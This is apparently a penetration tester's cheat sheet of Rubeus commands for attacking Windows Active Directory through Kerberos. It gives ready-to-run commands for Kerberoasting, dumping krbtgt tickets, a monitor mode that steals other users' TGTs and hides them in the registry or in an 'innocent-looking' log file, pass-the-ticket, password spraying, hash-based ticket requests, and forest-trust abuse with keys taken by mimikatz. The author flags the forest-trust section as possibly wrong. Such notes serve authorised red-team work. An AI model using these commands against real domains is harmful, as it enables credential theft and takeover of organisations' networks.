Rubeus.exe
Rubeus is wonderful for playing with hashes and Kerberos tickets.
Kerberoasting attack
rubeus.exe kerberoast /simple /outfile:kerberoast.txt
Dump tickets
rubeus.exe dump /service:krbtgt /nowrap
Monitor mode
This is handy when you're WinRM'd into a box with local/domain admin creds and you want to steal other TGTs:
rubeus monitor /interval:5 /nowrap /runfor:60 /registry:SOFTWARE\MONITOR
Monitor mode - save to disk
If for some reason the TGTs won't write to registry, try this to write to disk:
rubeus monitor /interval:5 /nowrap /runfor:60 /consoleoutfile:c:\users\public\some-innocent-looking-file.log"
Extracting TGTs from registry hives after monitor mode attack
Once you've done the monitor "attack" and captured TGTs to the registry, use reg.exe to extract them.
Grab the TGTs from registry
reg export HKLM\SOFTWARE\MONITOR backup1.reg
Once you have the TGTs, use something like rubeus2ccache to convert to kirbi
or ccache
(reference). Then you can use rubeus to pass the TGT.
Pass-the-ticket
rubeus.exe ptt /ticket:xxx
Password spraying
rubeus.exe spray /password:MySprayedPass2024! /domain:domain.com /dc:1.2.3.4 /outfile:successful-sprays.txt
Request a TGT
rubeus.exe asktgt /domain:domain.com /user:blah /rc4:NTLMHASH /nowrap
Note: if doing asktgt
for a domain controller be sure to use the trailing dollar sign, i.e. DC01$
Request a TGT when abusing forest trusts [ UNDER REVIEW ]
I was working on this in a lab and don't think this section below is right, so ignore it until further review.
If you're in a situation where you've got DA on DOMAIN2.COM and want to abuse that to pwn DOMAIN1.COM, and you've extracted domain SIDs with get-adobject and you've extracted trust keys with mimikatz, you can do something like this to request a TGT for the pwned domain:
rubeus.exe asktgt /user:domain2$ /domain:domain1.com /rc4:THE-rc4_hmac_nt-YOU-EXTRACTED-WITH-MIMIKATZ /nowrap
Describe a ticket
rubeus.exe describe /ticket:base64ticket
This came in real handy during an engagement where I had lifted a TGT from a system and was trying to pass it and use it and was getting all sorts of errors. When I ran the describe
command the output said KeyType=180
which I learned means credential guard is in place and that ticket won't work anywhere else but the box it came from!